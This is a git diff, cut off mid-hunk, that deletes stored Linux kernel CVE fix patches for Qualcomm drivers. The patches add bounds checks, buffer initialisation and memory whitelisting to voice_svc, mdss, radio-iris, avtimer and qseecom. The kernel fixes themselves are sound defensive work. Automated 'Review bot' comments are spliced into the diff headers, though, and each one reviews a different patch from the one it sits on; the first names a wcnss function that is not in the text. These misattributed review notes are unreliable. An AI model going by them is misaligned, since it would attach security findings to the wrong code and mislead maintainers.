deleted file mode 100644
index 1f15f28b..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5343/ANY/0001.patch
+++ /dev/null
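Review bot: The replacement bound in the embedded wcnss_wlan_write() hunk trusts `penv->user_cal_exp_size`, and the same line drops the fixed `MAX_CALIBRATED_DATA_SIZE` ceiling. If `user_cal_exp_size` is derived from what the writer supplied (its assignment is outside the hunk, so this needs confirming), the check is only as strong as the validation done where that field is set. Keeping both limits costs nothing: `MAX_CALIBRATED_DATA_SIZE < count + penv->user_cal_rcvd || penv->user_cal_exp_size < count + penv->user_cal_rcvd`. The function body starts and ends outside the hunk.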
@@ -1,101 +0,0 @@
-From 6927e2e0af4dcac357be86ba563c9ae12354bb08 Mon Sep 17 00:00:00 2001
-From: Josh Kirsch
-Date: Mon, 2 May 2016 14:55:04 -0700
-Subject: drivers: soc: Add buffer overflow check for svc send request
-
-Add buffer overflow check in voice_svc_send_req.
-
-CRs-fixed: 1010081
-Change-Id: I4ae703334b0cf04f327b392bc9cd6febd4ad32f2
-Signed-off-by: Josh Kirsch
----
- drivers/soc/qcom/qdsp6v2/voice_svc.c | 46 +++++++++++++++++++++++++-----------
- 1 file changed, 32 insertions(+), 14 deletions(-)
-
-diff --git a/drivers/soc/qcom/qdsp6v2/voice_svc.c b/drivers/soc/qcom/qdsp6v2/voice_svc.c
-index 23b8292..67c58d1 100644
---- a/drivers/soc/qcom/qdsp6v2/voice_svc.c
-+++ b/drivers/soc/qcom/qdsp6v2/voice_svc.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2014-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2014-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -188,7 +188,8 @@ static int voice_svc_send_req(struct voice_svc_cmd_request *apr_request,
- int ret = 0;
- void *apr_handle = NULL;
- struct apr_data *aprdata = NULL;
-- uint32_t user_payload_size = 0;
-+ uint32_t user_payload_size;
-+ uint32_t payload_size;
-
- pr_debug("%s\n", __func__);
-
-@@ -200,15 +201,19 @@ static int voice_svc_send_req(struct voice_svc_cmd_request *apr_request,
- }
-
- user_payload_size = apr_request->payload_size;
-+ payload_size = sizeof(struct apr_data) + user_payload_size;
-
-- aprdata = kmalloc(sizeof(struct apr_data) + user_payload_size,
-- GFP_KERNEL);
--
-- if (aprdata == NULL) {
-- pr_err("%s: aprdata kmalloc failed.\n", __func__);
--
-- ret = -ENOMEM;
-+ if (payload_size <= user_payload_size) {
-+ pr_err("%s: invalid payload size ( 0x%x ).\n",
-+ __func__, user_payload_size);
-+ ret = -EINVAL;
- goto done;
-+ } else {
-+ aprdata = kmalloc(payload_size, GFP_KERNEL);
-+ if (aprdata == NULL) {
-+ ret = -ENOMEM;
-+ goto done;
-+ }
- }
-
- voice_svc_update_hdr(apr_request, aprdata);
-@@ -388,18 +393,31 @@ static ssize_t voice_svc_write(struct file *file, const char __user *buf,
-
- switch (cmd) {
- case MSG_REGISTER:
-- ret = process_reg_cmd(
-+ if (count >=
-+ (sizeof(struct voice_svc_register) +
-+ sizeof(*data))) {
-+ ret = process_reg_cmd(
- (struct voice_svc_register *)data->payload, prtd);
-- if (!ret)
-- ret = count;
--
-+ if (!ret)
-+ ret = count;
-+ } else {
-+ pr_err("%s: invalid payload size\n", __func__);
-+ ret = -EINVAL;
-+ goto done;
-+ }
- break;
- case MSG_REQUEST:
-+ if (count >= (sizeof(struct voice_svc_cmd_request) +
-+ sizeof(*data))) {
- ret = voice_svc_send_req(
- (struct voice_svc_cmd_request *)data->payload, prtd);
- if (!ret)
- ret = count;
--
-+ } else {
-+ pr_err("%s: invalid payload size\n", __func__);
-+ ret = -EINVAL;
-+ goto done;
-+ }
- break;
- default:
- pr_debug("%s: Invalid command: %u\n", __func__, cmd);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5344/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-5344/ANY/0001.patch
deleted file mode 100644
index 89c1cc05..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5344/ANY/0001.patch
+++ /dev/null
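Review bot: In the embedded voice_svc.c patch the new `count >=` guards in voice_svc_write() bound only the fixed headers, so `apr_request->payload_size` still reaches voice_svc_send_req() without ever being compared to the number of bytes actually written. The `payload_size <= user_payload_size` test stops the 32-bit wrap of the kmalloc size, but a declared payload larger than `count` allows would presumably be read from beyond the data the caller supplied once the payload is copied (that copy is outside the hunk, so this needs confirming). In the MSG_REQUEST branch I would also reject the request with -EINVAL when the declared payload exceeds `count - sizeof(*data) - sizeof(struct voice_svc_cmd_request)`. Both function bodies extend beyond the hunks shown.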
@@ -1,167 +0,0 @@
-From 64e15c36d6c1c57dc2d95a3f163bc830a469fc20 Mon Sep 17 00:00:00 2001
-From: Dhaval Patel
-Date: Tue, 22 Mar 2016 22:56:38 -0700
-Subject: msm: mdss: validate layer count before copying userdata
-
-Validate input layer count in rotator and async update
-ioctl call before copying the rotator request list and
-async update layer list.
-
-Change-Id: I3489e5a2d4237a47bddf56c2f44c9e3001f0b2b4
-Signed-off-by: Dhaval Patel
----
- drivers/video/msm/mdss/mdss_compat_utils.c | 6 +++---
- drivers/video/msm/mdss/mdss_fb.c | 6 +++---
- drivers/video/msm/mdss/mdss_fb.h | 3 +--
- drivers/video/msm/mdss/mdss_mdp.h | 4 +++-
- drivers/video/msm/mdss/mdss_rotator.c | 20 +++++++++++++++++---
- 5 files changed, 27 insertions(+), 12 deletions(-)
-
-diff --git a/drivers/video/msm/mdss/mdss_compat_utils.c b/drivers/video/msm/mdss/mdss_compat_utils.c
-index 3bc5de6..e391a5a 100644
---- a/drivers/video/msm/mdss/mdss_compat_utils.c
-+++ b/drivers/video/msm/mdss/mdss_compat_utils.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2013-2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2013-2016, The Linux Foundation. All rights reserved.
- * Copyright (C) 1994 Martin Schaller
- *
- * 2001 - Documented with DocBook
-@@ -445,8 +445,8 @@ static int __compat_async_position_update(struct fb_info *info,
-
- update_pos.input_layer_cnt = update_pos32.input_layer_cnt;
- layer_cnt = update_pos32.input_layer_cnt;
-- if (!layer_cnt) {
-- pr_err("no async layer to update\n");
-+ if ((!layer_cnt) || (layer_cnt > MAX_LAYER_COUNT)) {
-+ pr_err("invalid async layers :%d to update\n", layer_cnt);
- return -EINVAL;
- }
-
-diff --git a/drivers/video/msm/mdss/mdss_fb.c b/drivers/video/msm/mdss/mdss_fb.c
-index 73ab61e..9aa87d0 100644
---- a/drivers/video/msm/mdss/mdss_fb.c
-+++ b/drivers/video/msm/mdss/mdss_fb.c
-@@ -2,7 +2,7 @@
- * Core MDSS framebuffer driver.
- *
- * Copyright (C) 2007 Google Incorporated
-- * Copyright (c) 2008-2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2008-2016, The Linux Foundation. All rights reserved.
- *
- * This software is licensed under the terms of the GNU General Public
- * License version 2, as published by the Free Software Foundation, and
-@@ -3781,8 +3781,8 @@ static int mdss_fb_async_position_update_ioctl(struct fb_info *info,
- input_layer_list = update_pos.input_layers;
-
- layer_cnt = update_pos.input_layer_cnt;
-- if (!layer_cnt) {
-- pr_err("no async layers to update\n");
-+ if ((!layer_cnt) || (layer_cnt > MAX_LAYER_COUNT)) {
-+ pr_err("invalid async layers :%d to update\n", layer_cnt);
- return -EINVAL;
- }
-
-diff --git a/drivers/video/msm/mdss/mdss_fb.h b/drivers/video/msm/mdss/mdss_fb.h
-index 9bb8b40..f4825e3 100644
---- a/drivers/video/msm/mdss/mdss_fb.h
-+++ b/drivers/video/msm/mdss/mdss_fb.h
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2008-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2008-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -56,7 +56,6 @@
-
- #define MDP_PP_AD_BL_LINEAR 0x0
- #define MDP_PP_AD_BL_LINEAR_INV 0x1
--#define MAX_LAYER_COUNT 0xC
-
- /**
- * enum mdp_notify_event - Different frame events to indicate frame update state
-diff --git a/drivers/video/msm/mdss/mdss_mdp.h b/drivers/video/msm/mdss/mdss_mdp.h
-index b2083c5..40ec88c 100644
---- a/drivers/video/msm/mdss/mdss_mdp.h
-+++ b/drivers/video/msm/mdss/mdss_mdp.h
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -83,6 +83,8 @@
-
- #define XIN_HALT_TIMEOUT_US 0x4000
-
-+#define MAX_LAYER_COUNT 0xC
-+
- /* hw cursor can only be setup in highest mixer stage */
- #define HW_CURSOR_STAGE(mdata) \
- (((mdata)->max_target_zorder + MDSS_MDP_STAGE_0) - 1)
-diff --git a/drivers/video/msm/mdss/mdss_rotator.c b/drivers/video/msm/mdss/mdss_rotator.c
-index 86e3665..e3c46fc 100644
---- a/drivers/video/msm/mdss/mdss_rotator.c
-+++ b/drivers/video/msm/mdss/mdss_rotator.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2014-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2014-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -2129,6 +2129,7 @@ static int mdss_rotator_handle_request(struct mdss_rot_mgr *mgr,
- struct mdp_rotation_item *items = NULL;
- struct mdss_rot_entry_container *req = NULL;
- int size, ret;
-+ uint32_t req_count;
-
- ret = copy_from_user(&user_req, (void __user *)arg,
- sizeof(user_req));
-@@ -2137,12 +2138,18 @@ static int mdss_rotator_handle_request(struct mdss_rot_mgr *mgr,
- return ret;
- }
-
-+ req_count = user_req.count;
-+ if ((!req_count) || (req_count > MAX_LAYER_COUNT)) {
-+ pr_err("invalid rotator req count :%d\n", req_count);
-+ return -EINVAL;
-+ }
-+
- /*
- * here, we make a copy of the items so that we can copy
- * all the output fences to the client in one call. Otherwise,
- * we will have to call multiple copy_to_user
- */
-- size = sizeof(struct mdp_rotation_item) * user_req.count;
-+ size = sizeof(struct mdp_rotation_item) * req_count;
- items = devm_kzalloc(&mgr->pdev->dev, size, GFP_KERNEL);
- if (!items) {
- pr_err("fail to allocate rotation items\n");
-@@ -2281,6 +2288,7 @@ static int mdss_rotator_handle_request32(struct mdss_rot_mgr *mgr,
- struct mdp_rotation_item *items = NULL;
- struct mdss_rot_entry_container *req = NULL;
- int size, ret;
-+ uint32_t req_count;
-
- ret = copy_from_user(&user_req32, (void __user *)arg,
- sizeof(user_req32));
-@@ -2289,7 +2297,13 @@ static int mdss_rotator_handle_request32(struct mdss_rot_mgr *mgr,
- return ret;
- }
-
-- size = sizeof(struct mdp_rotation_item) * user_req32.count;
-+ req_count = user_req32.count;
-+ if ((!req_count) || (req_count > MAX_LAYER_COUNT)) {
-+ pr_err("invalid rotator req count :%d\n", req_count);
-+ return -EINVAL;
-+ }
-+
-+ size = sizeof(struct mdp_rotation_item) * req_count;
- items = devm_kzalloc(&mgr->pdev->dev, size, GFP_KERNEL);
- if (!items) {
- pr_err("fail to allocate rotation items\n");
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5345/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-5345/ANY/0001.patch
deleted file mode 100644
index af62b131..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5345/ANY/0001.patch
+++ /dev/null
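Review bot: `req_count` is declared `uint32_t` in both embedded mdss_rotator.c hunks but is printed with `%d` in `pr_err("invalid rotator req count :%d\n", req_count)`; `%u` matches the type and keeps a large rejected count from showing up in the log as a negative number. The same zero-or-greater-than-`MAX_LAYER_COUNT` test is now written out four times (the two async-position ioctls and the two rotator handlers), so a small shared inline helper beside the `MAX_LAYER_COUNT` definition in mdss_mdp.h would keep the native and compat paths from drifting apart. The rotator function bodies continue outside the hunks.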
@@ -1,55 +0,0 @@
-From 67118716a2933f6f30a25ea7e3946569a8b191c6 Mon Sep 17 00:00:00 2001
-From: Kamal Negi
-Date: Wed, 19 Oct 2016 18:59:11 +0530
-Subject: radio-iris: check argument values before copying the data
-
-Check arguments passed in an ioctl before copying the data to kernel
-buffers. If user sends an erroneous data, data length more than expected,
-will lead to buffer overflow.
-
-Change-Id: I663e937806f38dc3b04c8d7662cd8b045facd12b
-Signed-off-by: Kamal Negi
----
- drivers/media/radio/radio-iris.c | 19 ++++++++++++++++---
- 1 file changed, 16 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/media/radio/radio-iris.c b/drivers/media/radio/radio-iris.c
-index b3088eb..bd4eb92 100644
---- a/drivers/media/radio/radio-iris.c
-+++ b/drivers/media/radio/radio-iris.c
-@@ -3884,8 +3884,20 @@ static int iris_vidioc_s_ext_ctrls(struct file *file, void *priv,
- bytes_to_copy = (ctrl->controls[0]).size;
- spur_tbl_req.mode = data[0];
- spur_tbl_req.no_of_freqs_entries = data[1];
-- spur_data = kmalloc((data[1] * SPUR_DATA_LEN) + 2,
-- GFP_ATOMIC);
-+
-+ if (((spur_tbl_req.no_of_freqs_entries * SPUR_DATA_LEN) !=
-+ bytes_to_copy - 2) ||
-+ ((spur_tbl_req.no_of_freqs_entries * SPUR_DATA_LEN) >
-+ 2 * FM_SPUR_TBL_SIZE)) {
-+ FMDERR("Invalid data len: data[1] = %d, bytes = %zu",
-+ spur_tbl_req.no_of_freqs_entries,
-+ bytes_to_copy);
-+ retval = -EINVAL;
-+ goto END;
-+ }
-+ spur_data =
-+ kmalloc((spur_tbl_req.no_of_freqs_entries * SPUR_DATA_LEN)
-+ + 2, GFP_ATOMIC);
- if (!spur_data) {
- FMDERR("Allocation failed for Spur data");
- retval = -EFAULT;
-@@ -3900,7 +3912,8 @@ static int iris_vidioc_s_ext_ctrls(struct file *file, void *priv,
-
- if (spur_tbl_req.no_of_freqs_entries <= ENTRIES_EACH_CMD) {
- memcpy(&spur_tbl_req.spur_data[0], spur_data,
-- (data[1] * SPUR_DATA_LEN));
-+ (spur_tbl_req.no_of_freqs_entries *
-+ SPUR_DATA_LEN));
- retval = radio_hci_request(radio->fm_hdev,
- hci_fm_set_spur_tbl_req,
- (unsigned long)&spur_tbl_req,
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5346/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2016-5346/3.18/0001.patch
deleted file mode 100644
index 2b5b444e..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5346/3.18/0001.patch
+++ /dev/null
@@ -1,48 +0,0 @@
-From 6298a474322fb2182f795a622b2faa64abfd8474 Mon Sep 17 00:00:00 2001
-From: Xiaoyu Ye
-Date: Wed, 7 Dec 2016 16:35:07 -0800
-Subject: drivers: soc: qcom: Add error handling in function avtimer_ioctl
-
-Error handling is added to prevent garbage value being passed to
-user space by the uninitialized local variable avtimer_tick.
-
-CRs-Fixed: 1097878
-Change-Id: I3f895deaae3acf329088cf8135859cc41e781763
-Signed-off-by: Xiaoyu Ye
----
- drivers/platform/msm/avtimer.c | 14 +++++++++++---
- 1 file changed, 11 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/platform/msm/avtimer.c b/drivers/platform/msm/avtimer.c
-index 2bded5e..4331af8 100644
---- a/drivers/platform/msm/avtimer.c
-+++ b/drivers/platform/msm/avtimer.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -331,9 +331,17 @@ static long avtimer_ioctl(struct file *file, unsigned int ioctl_num,
- switch (ioctl_num) {
- case IOCTL_GET_AVTIMER_TICK:
- {
-- uint64_t avtimer_tick;
-+ uint64_t avtimer_tick = 0;
-+ int rc;
-+
-+ rc = avcs_core_query_timer(&avtimer_tick);
-+
-+ if (rc) {
-+ pr_err("%s: Error: Invalid AV Timer tick, rc = %d\n",
-+ __func__, rc);
-+ return rc;
-+ }
-
-- avcs_core_query_timer(&avtimer_tick);
- pr_debug_ratelimited("%s: AV Timer tick: time %llx\n",
- __func__, avtimer_tick);
- if (copy_to_user((void *) ioctl_param, &avtimer_tick,
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5346/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2016-5346/4.4/0002.patch
deleted file mode 100644
index fb5b5e83..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5346/4.4/0002.patch
+++ /dev/null
@@ -1,48 +0,0 @@
-From 25a64e34bbec7b14887cbfe8266ccf6f27113bab Mon Sep 17 00:00:00 2001
-From: Xiaoyu Ye
-Date: Wed, 7 Dec 2016 16:35:07 -0800
-Subject: drivers: soc: qcom: Add error handling in function avtimer_ioctl
-
-Error handling is added to prevent garbage value being passed to
-user space by the uninitialized local variable avtimer_tick.
-
-CRs-Fixed: 1097878
-Change-Id: I3f895deaae3acf329088cf8135859cc41e781763
-Signed-off-by: Xiaoyu Ye
----
- drivers/soc/qcom/avtimer.c | 14 +++++++++++---
- 1 file changed, 11 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/soc/qcom/avtimer.c b/drivers/soc/qcom/avtimer.c
-index 2bded5e..4331af8 100644
---- a/drivers/soc/qcom/avtimer.c
-+++ b/drivers/soc/qcom/avtimer.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -331,9 +331,17 @@ static long avtimer_ioctl(struct file *file, unsigned int ioctl_num,
- switch (ioctl_num) {
- case IOCTL_GET_AVTIMER_TICK:
- {
-- uint64_t avtimer_tick;
-+ uint64_t avtimer_tick = 0;
-+ int rc;
-+
-+ rc = avcs_core_query_timer(&avtimer_tick);
-+
-+ if (rc) {
-+ pr_err("%s: Error: Invalid AV Timer tick, rc = %d\n",
-+ __func__, rc);
-+ return rc;
-+ }
-
-- avcs_core_query_timer(&avtimer_tick);
- pr_debug_ratelimited("%s: AV Timer tick: time %llx\n",
- __func__, avtimer_tick);
- if (copy_to_user((void *) ioctl_param, &avtimer_tick,
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5347/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2016-5347/3.18/0001.patch
deleted file mode 100644
index 821b98fd..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5347/3.18/0001.patch
+++ /dev/null
@@ -1,31 +0,0 @@
-From ed4d6f5d8451d99860950d0abf8ad583efed6d5c Mon Sep 17 00:00:00 2001
-From: Xiaojun Sang
-Date: Fri, 16 Dec 2016 16:25:27 +0800
-Subject: ASoC: soc: msm: initialize buffer to prevent kernel data leakage
-
-To prevent potential kernel stack data leakage, initialize
-channel_map[].
-
-CRs-Fixed: 1100878
-Change-Id: I7b81cea20485bc7514551672bb54c7fd455049e3
-Signed-off-by: Xiaojun Sang
----
- sound/soc/msm/qdsp6v2/msm-qti-pp-config.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-qti-pp-config.c b/sound/soc/msm/qdsp6v2/msm-qti-pp-config.c
-index 9e34bd3..510ddc7 100644
---- a/sound/soc/msm/qdsp6v2/msm-qti-pp-config.c
-+++ b/sound/soc/msm/qdsp6v2/msm-qti-pp-config.c
-@@ -575,7 +575,7 @@ static int msm_qti_pp_set_sec_auxpcm_lb_vol_mixer(
- static int msm_qti_pp_get_channel_map_mixer(struct snd_kcontrol *kcontrol,
- struct snd_ctl_elem_value *ucontrol)
- {
-- char channel_map[PCM_FORMAT_MAX_NUM_CHANNEL];
-+ char channel_map[PCM_FORMAT_MAX_NUM_CHANNEL] = {0};
- int i;
-
- adm_get_multi_ch_map(channel_map, ADM_PATH_PLAYBACK);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5347/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2016-5347/4.4/0002.patch
deleted file mode 100644
index 3978c945..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5347/4.4/0002.patch
+++ /dev/null
@@ -1,31 +0,0 @@
-From f14390f13e62460fc6b05fc0acde0e825374fdb6 Mon Sep 17 00:00:00 2001
-From: Xiaojun Sang
-Date: Fri, 16 Dec 2016 16:25:27 +0800
-Subject: ASoC: soc: msm: initialize buffer to prevent kernel data leakage
-
-To prevent potential kernel stack data leakage, initialize
-channel_map[].
-
-CRs-Fixed: 1100878
-Change-Id: I7b81cea20485bc7514551672bb54c7fd455049e3
-Signed-off-by: Xiaojun Sang
----
- sound/soc/msm/qdsp6v2/msm-qti-pp-config.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-qti-pp-config.c b/sound/soc/msm/qdsp6v2/msm-qti-pp-config.c
-index 7c8af09..832d7c01 100644
---- a/sound/soc/msm/qdsp6v2/msm-qti-pp-config.c
-+++ b/sound/soc/msm/qdsp6v2/msm-qti-pp-config.c
-@@ -579,7 +579,7 @@ static int msm_qti_pp_set_sec_auxpcm_lb_vol_mixer(
- static int msm_qti_pp_get_channel_map_mixer(struct snd_kcontrol *kcontrol,
- struct snd_ctl_elem_value *ucontrol)
- {
-- char channel_map[PCM_FORMAT_MAX_NUM_CHANNEL];
-+ char channel_map[PCM_FORMAT_MAX_NUM_CHANNEL] = {0};
- int i;
-
- adm_get_multi_ch_map(channel_map, ADM_PATH_PLAYBACK);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5349/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-5349/ANY/0001.patch
deleted file mode 100644
index ea31acb6..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5349/ANY/0001.patch
+++ /dev/null
@@ -1,774 +0,0 @@
-From 7c3bf6557c62d904b15507eb451fda8fd7ef750c Mon Sep 17 00:00:00 2001
-From: Zhen Kong
-Date: Fri, 8 Jul 2016 14:40:45 -0700
-Subject: qseecom: support whitelist memory for qseecom_send_modfd_cmd
-
-qseecom_send_modfd_cmd converts ION buffer's virtual address to
-scatter gather(SG) list and then sends them to TA by populating
-SG list into message buffer. As the physical memory address in
-SG list is used directly by TA, this allows a malicious TA to
-access/corrupt arbitrary physical memory and may lead to the
-process gaining kernel/root privileges. Thus, make changes to
-have the QSEEComm driver passing a list of whitelist buffers
-that is allowed to be mapped by TA, and the QSEE kernel, in turn,
-should add checks to the register_shared_buffer syscall to make
-sure the shared buffers an application is mapping falls within
-one of these whitelist buffers.
-
-CRs-fixed: 1021945
-Change-Id: I776ead0030cad167afcf41ab985db7151a42d126
-Signed-off-by: Zhen Kong
----
- drivers/misc/qseecom.c | 370 +++++++++++++++++++++++++++++++++++++++-----
- include/soc/qcom/qseecomi.h | 47 +++++-
- 2 files changed, 375 insertions(+), 42 deletions(-)
-
-diff --git a/drivers/misc/qseecom.c b/drivers/misc/qseecom.c
-index 8117be74..7e6a179 100644
---- a/drivers/misc/qseecom.c
-+++ b/drivers/misc/qseecom.c
-@@ -181,6 +181,7 @@ struct qseecom_control {
- uint32_t qseos_version;
- uint32_t qsee_version;
- struct device *pdev;
-+ bool whitelist_support;
- bool commonlib_loaded;
- bool commonlib64_loaded;
- struct ion_handle *cmnlib_ion_handle;
-@@ -242,6 +243,30 @@ struct qseecom_listener_handle {
-
- static struct qseecom_control qseecom;
-
-+struct sglist_info {
-+ uint32_t indexAndFlags;
-+ uint32_t sizeOrCount;
-+};
-+
-+/*
-+ * The 31th bit indicates only one or multiple physical address inside
-+ * the request buffer. If it is set, the index locates a single physical addr
-+ * inside the request buffer, and `sizeOrCount` is the size of the memory being
-+ * shared at that physical address.
-+ * Otherwise, the index locates an array of {start, len} pairs (a
-+ * "scatter/gather list"), and `sizeOrCount` gives the number of entries in
-+ * that array.
-+ *
-+ * The 30th bit indicates 64 or 32bit address; when it is set, physical addr
-+ * and scatter gather entry sizes are 64-bit values. Otherwise, 32-bit values.
-+ *
-+ * The bits [0:29] of `indexAndFlags` hold an offset into the request buffer.
-+ */
-+#define SGLISTINFO_SET_INDEX_FLAG(c, s, i) \
-+ ((uint32_t)(((c & 1) << 31) | ((s & 1) << 30) | (i & 0x3fffffff)))
-+
-+#define SGLISTINFO_TABLE_SIZE (sizeof(struct sglist_info) * MAX_ION_FD)
-+
- struct qseecom_dev_handle {
- enum qseecom_client_handle_type type;
- union {
-@@ -255,6 +280,8 @@ struct qseecom_dev_handle {
- bool perf_enabled;
- bool fast_load_enabled;
- enum qseecom_bandwidth_request_mode mode;
-+ struct sglist_info *sglistinfo_ptr;
-+ uint32_t sglist_cnt;
- };
-
- struct qseecom_key_id_usage_desc {
-@@ -565,6 +592,38 @@ static int qseecom_scm_call2(uint32_t svc_id, uint32_t tz_cmd_id,
- ret = scm_call2(smc_id, &desc);
- break;
- }
-+ case QSEOS_CLIENT_SEND_DATA_COMMAND_WHITELIST: {
-+ struct qseecom_client_send_data_ireq *req;
-+ struct qseecom_client_send_data_64bit_ireq *req_64bit;
-+
-+ smc_id = TZ_APP_QSAPP_SEND_DATA_WITH_WHITELIST_ID;
-+ desc.arginfo =
-+ TZ_APP_QSAPP_SEND_DATA_WITH_WHITELIST_ID_PARAM_ID;
-+ if (qseecom.qsee_version < QSEE_VERSION_40) {
-+ req = (struct qseecom_client_send_data_ireq *)
-+ req_buf;
-+ desc.args[0] = req->app_id;
-+ desc.args[1] = req->req_ptr;
-+ desc.args[2] = req->req_len;
-+ desc.args[3] = req->rsp_ptr;
-+ desc.args[4] = req->rsp_len;
-+ desc.args[5] = req->sglistinfo_ptr;
-+ desc.args[6] = req->sglistinfo_len;
-+ } else {
-+ req_64bit =
-+ (struct qseecom_client_send_data_64bit_ireq *)
-+ req_buf;
-+ desc.args[0] = req_64bit->app_id;
-+ desc.args[1] = req_64bit->req_ptr;
-+ desc.args[2] = req_64bit->req_len;
-+ desc.args[3] = req_64bit->rsp_ptr;
-+ desc.args[4] = req_64bit->rsp_len;
-+ desc.args[5] = req_64bit->sglistinfo_ptr;
-+ desc.args[6] = req_64bit->sglistinfo_len;
-+ }
-+ ret = scm_call2(smc_id, &desc);
-+ break;
-+ }
- case QSEOS_RPMB_PROVISION_KEY_COMMAND: {
- struct qseecom_client_send_service_ireq *req;
- req = (struct qseecom_client_send_service_ireq *)
-@@ -686,6 +745,36 @@ static int qseecom_scm_call2(uint32_t svc_id, uint32_t tz_cmd_id,
- ret = scm_call2(smc_id, &desc);
- break;
- }
-+ case QSEOS_TEE_OPEN_SESSION_WHITELIST: {
-+ struct qseecom_qteec_ireq *req;
-+ struct qseecom_qteec_64bit_ireq *req_64bit;
-+
-+ smc_id = TZ_APP_GPAPP_OPEN_SESSION_WITH_WHITELIST_ID;
-+ desc.arginfo =
-+ TZ_APP_GPAPP_OPEN_SESSION_WITH_WHITELIST_ID_PARAM_ID;
-+ if (qseecom.qsee_version < QSEE_VERSION_40) {
-+ req = (struct qseecom_qteec_ireq *)req_buf;
-+ desc.args[0] = req->app_id;
-+ desc.args[1] = req->req_ptr;
-+ desc.args[2] = req->req_len;
-+ desc.args[3] = req->resp_ptr;
-+ desc.args[4] = req->resp_len;
-+ desc.args[5] = req->sglistinfo_ptr;
-+ desc.args[6] = req->sglistinfo_len;
-+ } else {
-+ req_64bit = (struct qseecom_qteec_64bit_ireq *)
-+ req_buf;
-+ desc.args[0] = req_64bit->app_id;
-+ desc.args[1] = req_64bit->req_ptr;
-+ desc.args[2] = req_64bit->req_len;
-+ desc.args[3] = req_64bit->resp_ptr;
-+ desc.args[4] = req_64bit->resp_len;
-+ desc.args[5] = req_64bit->sglistinfo_ptr;
-+ desc.args[6] = req_64bit->sglistinfo_len;
-+ }
-+ ret = scm_call2(smc_id, &desc);
-+ break;
-+ }
- case QSEOS_TEE_INVOKE_COMMAND: {
- struct qseecom_qteec_ireq *req;
- struct qseecom_qteec_64bit_ireq *req_64bit;
-@@ -710,6 +799,36 @@ static int qseecom_scm_call2(uint32_t svc_id, uint32_t tz_cmd_id,
- ret = scm_call2(smc_id, &desc);
- break;
- }
-+ case QSEOS_TEE_INVOKE_COMMAND_WHITELIST: {
-+ struct qseecom_qteec_ireq *req;
-+ struct qseecom_qteec_64bit_ireq *req_64bit;
-+
-+ smc_id = TZ_APP_GPAPP_INVOKE_COMMAND_WITH_WHITELIST_ID;
-+ desc.arginfo =
-+ TZ_APP_GPAPP_INVOKE_COMMAND_WITH_WHITELIST_ID_PARAM_ID;
-+ if (qseecom.qsee_version < QSEE_VERSION_40) {
-+ req = (struct qseecom_qteec_ireq *)req_buf;
-+ desc.args[0] = req->app_id;
-+ desc.args[1] = req->req_ptr;
-+ desc.args[2] = req->req_len;
-+ desc.args[3] = req->resp_ptr;
-+ desc.args[4] = req->resp_len;
-+ desc.args[5] = req->sglistinfo_ptr;
-+ desc.args[6] = req->sglistinfo_len;
-+ } else {
-+ req_64bit = (struct qseecom_qteec_64bit_ireq *)
-+ req_buf;
-+ desc.args[0] = req_64bit->app_id;
-+ desc.args[1] = req_64bit->req_ptr;
-+ desc.args[2] = req_64bit->req_len;
-+ desc.args[3] = req_64bit->resp_ptr;
